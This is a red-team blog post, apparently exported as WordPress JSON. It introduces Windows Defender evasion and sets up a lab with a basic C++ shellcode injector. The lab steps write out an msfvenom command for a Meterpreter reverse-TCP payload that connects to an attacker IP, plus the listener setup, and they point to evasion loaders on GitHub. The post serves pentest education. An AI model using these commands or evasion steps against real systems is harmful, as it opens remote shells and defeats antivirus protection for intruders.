{"id":2911,"date":"2025-04-07T22:00:19","date_gmt":"2025-04-07T22:00:19","guid":{"rendered":"https:\/\/www.hackmosphere.fr\/?p=2911"},"modified":"2026-06-12T17:21:48","modified_gmt":"2026-06-12T17:21:48","slug":"bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1","status":"publish","type":"post","link":"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/","title":{"rendered":"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><strong>Reading Time<\/strong>: 10 minutes<br\/><strong>Technical Level<\/strong>: Advanced<\/p>\n\n<p class=\"wp-block-paragraph\"><strong>Update: <\/strong> This post was last updated in June 2026 (mainly to add explanations about the compilation process, but the technique still works).<\/p>\n\n<h2 class=\"wp-block-heading\"><a>Introduction<\/a><\/h2>\n\n<p class=\"wp-block-paragraph\">As pentesters, we always have to keep up to date with the latest trends and of course, bypassing antiviruses is part of our activities. In this article, we will discuss how to bypass antiviruses and since the topic is quite big, it will be divided in two separate articles: <\/p>\n\n<ol class=\"wp-block-list\">\n<li>Basics of the Windows architecture and the workings of antivirus. Then we will cover how to setup a testing lab and executing raw shellcode using C++ <\/li>\n\n\n\n<li>How to bypass static &amp; dynamic detections using various techniques<\/li>\n<\/ol>\n\n<p class=\"wp-block-paragraph\">If you are already familiar with the theory behind antivirus evasion, you can go directly to the technical implementation, accessible here: https: <a href=\"https:\/\/www.hackmosphere.fr\/en\/bypass-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-2\/\" target=\"_blank\" rel=\"noopener\">\/\/www.hackmosphere.fr\/bypass-windows-defender-antivirus-2025-part-2\/.<\/a><\/p>\n\n<p class=\"wp-block-paragraph\">Evading antivirus detection remains a major challenge in offensive cybersecurity, particularly when dealing with Windows Defender, which is deployed by default on millions of Windows systems. In this technical article, we explore a modern bypass approach using shellcode encryption, direct syscalls and remote process injection. <\/p>\n\n<div style=\"height:39px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<p class=\"wp-block-paragraph\">    <strong>Key Takeaways<\/strong><\/p>\n\n<ul class=\"wp-block-list\">\n<li>Understanding basics of the Windows execution flow<\/li>\n\n\n\n<li>Understanding basics of how antiviruses work<\/li>\n\n\n\n<li>Setting up a lab for practice<\/li>\n\n\n\n<li>Executing raw shellcode using C++<\/li>\n\n\n\n<li>Implementing evasion techniques<\/li>\n<\/ul>\n\n<div style=\"height:36px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<p class=\"wp-block-paragraph\">All the code we present in this article is accessible here: https: <a href=\"https:\/\/Github.com\/hackmosphere\/DefenderBypass\">\/\/Github.com\/hackmosphere\/DefenderBypass.<\/a> We aim to provide several examples that should help you understanding the different steps used for bypassing antiviruses (AVs). Before diving into it, here is a brief overview of what each file does :  <\/p>\n\n<ul class=\"wp-block-list\">\n<li><strong>myEncoder3.py <\/strong>: Transforms a given binary file&#8217;s (.bin) data into hexadecimal data and XOR encrypts it using the given key. Upon running the script, both the non-encrypted and encrypted hex data is shown to the user <\/li>\n\n\n\n<li><strong>InjectBasic.cpp <\/strong>: Basic shellcode injector written in C++<\/li>\n\n\n\n<li><strong>InjectCryptXOR.cpp <\/strong>: InjectBasic.cpp + XOR decryption of a given XOR encrypted shellcode<\/li>\n\n\n\n<li><strong>InjectSyscall-LocalProcess.cpp <\/strong>: InjectCryptXOR.cpp + injection of the shellcode in the local process &amp; using direct syscalls to bypass userland hooks and removing suspicious functions from the Import Address Table (IAT)<\/li>\n\n\n\n<li><strong>InjectSyscall-RemoteProcess.cpp: <\/strong> InjectSyscallLocalProcess.cpp, but injecting into a remote process instead of the local process<\/li>\n<\/ul>\n\n<div style=\"height:27px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<p class=\"wp-block-paragraph\"><strong>Disclaimer<\/strong><\/p>\n\n<p class=\"wp-block-paragraph\">This is not a tutorial to make a malicious malware, but a practical case for educational purpose only.<\/p>\n\n<p class=\"wp-block-paragraph\">Moreover, the code will probably not work anymore soon after it&#8217;s disclosure. It is up to you to make it work again by adding (often minor) modifications to it (hint: threatcheck.exe should help you) \ud83d\ude0a <\/p>\n\n<div style=\"height:43px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<h2 class=\"wp-block-heading\">Basics of Windows execution flow<\/h2>\n\n<p class=\"wp-block-paragraph\">Before delving into the topic of antivirus evasion, it is important to first understand some basics about Windows.<\/p>\n\n<p class=\"wp-block-paragraph\">The simple diagram shown below, made by Alexander Sotirov, represents the Windows program execution flow, specifically focusing on the relationship between applications, libraries (DLLs), and the Windows kernel :<\/p>\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"989\" height=\"687\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image.png\" alt=\"Basics of Windows execution flow\" class=\"wp-image-2885\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image.png 989w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-980x681.png 980w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-480x333.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 989px, 100vw\" \/><\/figure>\n\n<p class=\"wp-block-paragraph\">Here&#8217;s a breakdown of each component shown in the figure above:<\/p>\n\n<ol class=\"wp-block-list\">\n<li><strong>Applications<\/strong> represent the programs that users interact with, like &#8220;firefox.exe&#8221;<\/li>\n\n\n\n<li>Applications make calls to Dynamic Link Libraries<strong>(DLLs<\/strong>) to leverage Windows functionalities without needing direct access to lower-level code. Some of these DLLs might handle tasks such as user interface operations or file management <\/li>\n\n\n\n<li><strong>Kernel32.dll<\/strong> is one of the core DLLs in the Windows operating system. It provides essential functions for memory management, operations or process and thread creation <\/li>\n\n\n\n<li><strong>Ntdll.dll<\/strong> is the lowest level of user-mode DLLs. It exposes the NT API (Native API), which allows applications to make low-level calls that interface with the Windows kernel. This library acts as a middle layer between user-mode components (like applications) and the kernel, converting user requests into system calls<strong>(syscalls<\/strong>, more on that later) that the kernel can understand  <\/li>\n\n\n\n<li>The <strong>kernel<\/strong> is the core part of the Windows operating system, responsible for managing system resources, including memory, processes, and hardware interactions. It operates in &#8220;kernel-mode,&#8221; which has unrestricted access to the hardware, unlike &#8220;user-mode&#8221;, where applications and DLLs run with limited permissions. The kernel handles system calls made from Ntdll.dll and executes them with direct access to system resources  <\/li>\n<\/ol>\n\n<h3 class=\"wp-block-heading\">Example of operation flow for creating a file in C++.<\/h3>\n\n<ol class=\"wp-block-list\">\n<li><strong>CreateFile function is invoked<\/strong> <strong>in the code<\/strong> &#8211; Applications make API calls to interact with the system<\/li>\n\n\n\n<li><strong>CreateFile forwards to NtCreateFile<\/strong> &#8211; Calls are passed through various DLLs (such as Kernel32) or directly to Ntdll.dll<\/li>\n\n\n\n<li><strong>NtCreateFile syscall is triggered<\/strong> &#8211; Ntdll.dll converts these API calls into low-level system calls<strong>(syscalls<\/strong>)<\/li>\n\n\n\n<li><strong>Creates the file and returns a handle<\/strong> &#8211; The kernel executes these system calls, managing hardware and system resources as needed<\/li>\n<\/ol>\n\n<div style=\"height:40px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<h2 class=\"wp-block-heading\">Antivirus &amp; Shellcode overview<\/h2>\n\n<p class=\"wp-block-paragraph\">Antivirus (AV) &amp; Endpoint Detection and Response (EDR) are both critical components of cybersecurity, but they serve distinct purposes.<\/p>\n\n<h3 class=\"wp-block-heading\">AV vs EDR: Key Differences<\/h3>\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"979\" height=\"535\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png\" alt=\"AV vs EDR: Key Differences\" class=\"wp-image-2887\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png 979w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1-480x262.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 979px, 100vw\" \/><\/figure>\n\n<h3 class=\"wp-block-heading\">Antivirus<\/h3>\n\n<p class=\"wp-block-paragraph\">Windows Defender, like any traditional antivirus solution, primarily focuses on <strong>preventive approach<\/strong>. It relies on two main pillars to detect and mitigate threats: <\/p>\n\n<ul class=\"wp-block-list\">\n<li>Static Analysis: Identifying threats by matching known signatures in files.<\/li>\n\n\n\n<li>Dynamic Analysis: Monitoring application behavior using sandboxing or limited behavioral analysis techniques.<\/li>\n<\/ul>\n\n<p class=\"wp-block-paragraph\">While effective against known threats, this approach often falls short against advanced and emerging attack vectors.<\/p>\n\n<h3 class=\"wp-block-heading\">EDR (Endpoint Detection and Response)<\/h3>\n\n<p class=\"wp-block-paragraph\">These solutions go beyond prevention, taking a more <strong>proactive and investigative approach<\/strong>. They let programs run and continuously monitor endpoint (servers, computers&#8230;) activity, leveraging behavioral analysis at the kernel level and other advanced detection mechanisms to uncover anomalies and potential threats. <\/p>\n\n<h3 class=\"wp-block-heading\">Antivirus VS EDR<\/h3>\n\n<p class=\"wp-block-paragraph\">Antivirus focuses on stopping threats before they get executed on the system, serving as a virtual &#8220;front door lock&#8221;.<\/p>\n\n<p class=\"wp-block-paragraph\">EDR assumes that breaches are inevitable, prioritizing post-compromise visibility and incident response, to minimize damage and facilitate recovery.<\/p>\n\n<p class=\"wp-block-paragraph\">Together, these tools form a layered defense strategy, with antivirus addressing prevention and EDR focusing on detection, investigation, and remediation.<\/p>\n\n<p class=\"wp-block-paragraph\"><em>Note: This blog explores the intricacies of antivirus evasion, while the equally critical topic of EDR evasion deserves its own dedicated article. Stay tuned! <\/em><\/p>\n\n<div style=\"height:44px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<h2 class=\"wp-block-heading\">Shellcode understanding<\/h2>\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"799\" height=\"144\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-2.png\" alt=\"Shellcode understanding\" class=\"wp-image-2889\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-2.png 799w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-2-480x87.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 799px, 100vw\" \/><\/figure>\n\n<p class=\"wp-block-paragraph\">When exploiting a vulnerability in a target, you need a payload that will make the victim do what you want.<\/p>\n\n<p class=\"wp-block-paragraph\"><strong>Payloads<\/strong> can take several forms, one of which is called a <strong>shellcode<\/strong>. Typically written in binary, shellcode is injected into a target&#8217;s process or memory space to execute malicious instructions. <\/p>\n\n<p class=\"wp-block-paragraph\">The term &#8220;shellcode&#8221; originates from its original purpose: delivering a shell (command prompt) to the attacker, but modern shellcode can perform various tasks, from privilege escalation to downloading and executing additional payloads. In cybersecurity, shellcode is both a weapon for attackers and a tool for defenders, such as penetration testers, who use it to simulate real-world exploits during security assessments. Understanding shellcode is critical for detecting and mitigating attacks that leverage this technique to bypass defences and compromise systems.  <\/p>\n\n<h3 class=\"wp-block-heading\">Shellcode injection<\/h3>\n\n<p class=\"wp-block-paragraph\">Allocate &#8211; Write &#8211; Execute | These are the steps usually done to inject shellcode in a process (other advanced techniques can be used but they are not in the scope of the article) :<\/p>\n\n<ul class=\"wp-block-list\">\n<li>Allocating a RWX memory region with the size of the shellcode<\/li>\n\n\n\n<li>Writing the shellcode in that memory region<\/li>\n\n\n\n<li>Executing the content of the allocated memory<\/li>\n<\/ul>\n\n<div style=\"height:43px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<h2 class=\"wp-block-heading\"><a>How to set up a lab to bypass an antivirus?<\/a><\/h2>\n\n<p class=\"wp-block-paragraph\">For testing, you need an attacking Kali VM and a victim Windows VM: They must be able to communicate with one another.<\/p>\n\n<h3 class=\"wp-block-heading\">Kali<\/h3>\n\n<p class=\"wp-block-paragraph\">In the attacking Kali VM (here 192.168.242.128), you MUST :<\/p>\n\n<ul class=\"wp-block-list\">\n<li>Generate a Meterpreter shellcode (which is highly detectable by antivirus software\u2014on purpose \ud83d\ude09) that will be injected into our loader. For example: \n<ul class=\"wp-block-list\">\n<li>msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=192.168.242.128 LPORT=443 EXITFUNC=thread &#8211;platform windows -f raw -o reverse64-192168242128-443.bin  <\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n<figure class=\"wp-block-image size-full\"><img alt=\"\" alt=\"\" loading=\"lazy\" decoding=\"async\" width=\"937\" height=\"149\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-3.png\" alt=\"\" class=\"wp-image-2891\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-3.png 937w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-3-480x76.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 937px, 100vw\" \/><\/figure>\n\n<ul class=\"wp-block-list\">\n<li>Launch a Meterpreter listener to receive the connection from the Windows victim when you run your loader :<ul><li>msfconsole use exploit\/multi\/handler set payload windows\/x64\/meterpreter\/reverse_tcp set LPORT 443 set LHOST 192.168.242.128<\/li><\/ul>\n<ul class=\"wp-block-list\">\n<li>run<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n<figure class=\"wp-block-image size-full\"><img alt=\"\" alt=\"\" loading=\"lazy\" decoding=\"async\" width=\"979\" height=\"246\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-4.png\" alt=\"\" class=\"wp-image-2893\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-4.png 979w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-4-480x121.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 979px, 100vw\" \/><\/figure>\n\n<div style=\"height:41px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<h3 class=\"wp-block-heading\">Windows<\/h3>\n\n<p class=\"wp-block-paragraph\">In the Windows victim, you MUST :<\/p>\n\n<ul class=\"wp-block-list\">\n<li>Ensure the attacking VM and victim VM can communicate with one another<\/li>\n\n\n\n<li>Ensure both Windows and Defender are up-to-date<\/li>\n\n\n\n<li>Make an antivirus exclusion on a chosen directory. This will ensure that your program works at all before attempting to actually bypass Defender <\/li>\n\n\n\n<li>When testing locally, you may want to <strong>disable &#8220;Automatic sample submission&#8221;.<\/strong> Otherwise, your test executables might be uploaded to Microsoft for analysis and quickly flagged by Defender and other AVs &#8211; even before you&#8217;ve finished development. <br\/><br\/>\u26a0\ufe0f Note: While turning off sample submission can help during development, it does impact Defender&#8217;s overall detection capabilities, particularly when using higher Cloud Protection Levels. In those setups, Defender may rely on the cloud to determine whether a file is malicious. Disabling submission can limit that analysis.<br\/>This setup is intended for local lab use only &#8211; always re-enable full protection (including sample submission) outside of controlled test environments.  <\/li>\n<\/ul>\n\n<figure class=\"wp-block-image size-full\"><img alt=\"\" alt=\"\" loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"283\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-5.png\" alt=\"\" class=\"wp-image-2895\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-5.png 901w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-5-480x151.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 901px, 100vw\" \/><\/figure>\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<h3 class=\"wp-block-heading\">How to execute basic shellcode using C++ ?<\/h3>\n\n<p class=\"wp-block-paragraph\">While setting up the lab, you should now have a file called &#8220;reverse64-192168242128-443.bin&#8221;. This file contains the shellcode that you must execute to connect back to your attacking machine and obtain full control over the victim.<\/p>\n\n<p class=\"wp-block-paragraph\">As discussed earlier, shellcode is binary data. We will therefore need to convert it to hexadecimal data so that C++ can use it. This can be done using myEncoder3.py, available <a href=\"https:\/\/github.com\/Hackmosphere\/DefenderBypass\/blob\/main\/myEncoder3.py\">here<\/a> (don&#8217;t forget to run &#8220;pip3 install -r requirements.txt&#8221; first):  <\/p>\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"315\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-6-1024x315.png\" alt=\"How to execute basic shellcode using C++ ?\" class=\"wp-image-2897\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-6-1024x315.png 1024w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-6-980x301.png 980w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-6-480x147.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1024px, 100vw\" \/><\/figure>\n\n<div style=\"height:109px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<p class=\"wp-block-paragraph\">Now that the lab is up and that you created your shellcode, it is FINALLY time to implement your first shellcode injection! Yeyy! <\/p>\n\n<figure class=\"wp-block-image aligncenter size-full\"><img alt=\"\" alt=\"\" loading=\"lazy\" decoding=\"async\" width=\"357\" height=\"352\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-7.png\" alt=\"\" class=\"wp-image-2899\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-7.png 357w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-7-300x296.png 300w\" sizes=\"(max-width: 357px) 100vw, 357px\" \/><\/figure>\n\n<div style=\"height:103px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<p class=\"wp-block-paragraph\">From the GitHub repository, you can download the C++ file<a href=\"https:\/\/github.com\/Hackmosphere\/DefenderBypass\/blob\/main\/injectBasic.cpp\">\u201cinjectBasic.cpp<\/a>\u201d. It provides a very basic shellcode injection technique (Allocate &#8211; Write &#8211; Execute, remember? \ud83d\ude0a). Here are the key steps of our implementation:  <\/p>\n\n<figure class=\"wp-block-image size-full\"><img alt=\"\" alt=\"\" loading=\"lazy\" decoding=\"async\" width=\"979\" height=\"344\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-8.png\" alt=\"\" class=\"wp-image-2901\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-8.png 979w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-8-480x169.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 979px, 100vw\" \/><\/figure>\n\n<p class=\"wp-block-paragraph\"><strong>Code explanation : <\/strong> the shellcode obtained from myEncoder3.py is first added in the &#8220;shellcode[]&#8221; array. RWX memory of the size of the shellcode is then allocated through &#8220;VirtualAlloc()&#8221;. The shellcode is then copied there with &#8220;memcpy()&#8221; before being executed.  <\/p>\n\n<p class=\"wp-block-paragraph\"><strong>OPSEC: <\/strong>Allocating PAGE_EXECUTE_READWRITE rights is a strong indicator and often results in being flagged by security solutions. It would be more opsec friendly to first set the memory protection to PAGE_READWRITE, write the payload and then set it to be executable. For an example of OPSEC friendly implementation, check the next article \ud83d\ude09  <\/p>\n\n<p class=\"wp-block-paragraph\"><strong>Installing g++<\/strong>: <a href=\"https:\/\/gist.github.com\/ahmednawazkhan\/4da8acbdafe0798527874b0f00f16e45#file-installing-cpp-on-windows-md\">A Step-by-Step Guide<\/a><\/p>\n\n<p class=\"wp-block-paragraph\"><strong>Compiling:<\/strong> g++ injectBasic.cpp -o OutputFile.exe -O2 -s -fno-exceptions -fno-rtti -ffunction-sections -fdata-sections -Wl, &#8211;gc-sections -std=c++11<\/p>\n\n<p class=\"wp-block-paragraph\"><strong>Running <\/strong>&#8220;FirstExample.exe&#8221; in the exclusion folder :<\/p>\n\n<ul class=\"wp-block-list\">\n<li>in the folder <em>where you have an exclusion, <\/em>running your code should provide you with a Meterpreter reverse shell in your attacking machine? \ud83d\ude0a<\/li>\n<\/ul>\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img alt=\"\" alt=\"\" loading=\"lazy\" decoding=\"async\" width=\"966\" height=\"314\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-9.png\" alt=\"\" class=\"wp-image-2903\" style=\"width:735px;height:auto\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-9.png 966w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-9-480x156.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 966px, 100vw\" \/><\/figure>\n\n<ul class=\"wp-block-list\">\n<li>Now try dropping the executable to a folder where no exclusion is in place: It should result in immediate detection from Windows Defender.<\/li>\n<\/ul>\n\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img alt=\"\" alt=\"\" loading=\"lazy\" decoding=\"async\" width=\"632\" height=\"654\" src=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-10.png\" alt=\"\" class=\"wp-image-2905\" style=\"width:459px\" srcset=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-10.png 632w, https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-10-480x497.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 632px, 100vw\" \/><\/figure>\n\n<div style=\"height:60px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n<h2 class=\"wp-block-heading\">Conclusion<\/h2>\n\n<p class=\"wp-block-paragraph\">In this first of a two-article series, we established basics to understand the Windows execution flow, what are antiviruses and how they work.<\/p>\n\n<p class=\"wp-block-paragraph\">We also explained how to set up a lab so you can practice with complete peace of mind. Finally, we provided basic C++ code to execute shellcode generated using msfvenom. Obviously, this code was immediately detected upon landing on the disk. <\/p>\n\n<p class=\"wp-block-paragraph\">The second article, available <a href=\"https:\/\/www.hackmosphere.fr\/en\/bypass-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-2\/\" target=\"_blank\" rel=\"noopener\">here<\/a>, discusses how to implement evasion techniques that will bypass Windows Defender&#8217;s detection.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Reading Time: 10 minutesTechnical Level: Advanced Update: This post was last updated in June 2026 (mainly to add explanations about the compilation process, but the technique still works). Introduction As pentesters, we always have to keep up to date with the latest trends and of course, bypassing antiviruses is part of our activities. In this [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2888,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_titles_title":"Windows Defender antivirus bypass in 2025 - part 1","_seopress_titles_desc":"Discover how antivirus works and how to setup a lab for (Windows Defender) antivirus bypass. Basic code is provided to start experimenting!","_seopress_robots_index":"","_seopress_robots_follow":"","_seopress_robots_imageindex":"","_seopress_robots_snippet":"","_seopress_robots_primary_cat":"8","_seopress_robots_breadcrumbs":"","_seopress_robots_freeze_modified_date":"","_seopress_robots_custom_modified_date":"","_seopress_robots_canonical":"","_seopress_social_fb_title":"","_seopress_social_fb_desc":"","_seopress_social_fb_img":"","_seopress_social_fb_img_attachment_id":0,"_seopress_social_fb_img_width":0,"_seopress_social_fb_img_height":0,"_seopress_social_twitter_title":"","_seopress_social_twitter_desc":"","_seopress_social_twitter_img":"","_seopress_social_twitter_img_attachment_id":0,"_seopress_social_twitter_img_width":0,"_seopress_social_twitter_img_height":0,"_seopress_redirections_value":"","_seopress_redirections_enabled":"","_seopress_redirections_enabled_regex":"","_seopress_redirections_logged_status":"both","_seopress_redirections_param":"","_seopress_redirections_type":301,"_seopress_analysis_target_kw":"","_et_pb_use_builder":"off","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[41,18,44],"tags":[],"class_list":["post-2911","post","type-post","status-publish","format-standard","has-post-thumbnail","category-cyber-services","category-red-team","category-red-teaming-en"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1 - Hackmosphere<\/title>\n<meta name=\"description\" content=\"Discover how antivirus works and how to setup a lab for (Windows Defender) antivirus bypass. Basic code is provided to start experimenting!\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1 - Hackmosphere\" \/>\n<meta property=\"og:description\" content=\"Discover how antivirus works and how to setup a lab for (Windows Defender) antivirus bypass. Basic code is provided to start experimenting!\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.hackmosphere.fr\/en\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\/\" \/>\n<meta property=\"og:site_name\" content=\"Hackmosphere\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-07T22:00:19+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-06-12T17:21:48+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.hackmosphere.fr\/wp-content\/uploads\/2025\/03\/image-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"979\" \/>\n\t<meta property=\"og:image:height\" content=\"535\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"hackmin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"hackmin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/\"},\"author\":{\"name\":\"hackmin\",\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#\\\/schema\\\/person\\\/5821c6ff778edf6f4ebd2ee1f69fa937\"},\"headline\":\"Bypassing Windows Defender Antivirus in 2026: Evasion Techniques Using Direct System Calls and XOR Encryption \u2013 Part 1\",\"datePublished\":\"2025-04-07T22:00:19+00:00\",\"dateModified\":\"2026-06-12T17:21:48+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/\"},\"wordCount\":1855,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.hackmosphere.fr\\\/en\\\/bypassing-windows-defender-antivirus-in-2025-evasion-techniques-using-direct-syscalls-and-xor-encryption-part-1\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.hackmosphere.fr\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/image-1.png\",\"articleSection\":[\"Cyber Services\",\"Red Team\",\"Red 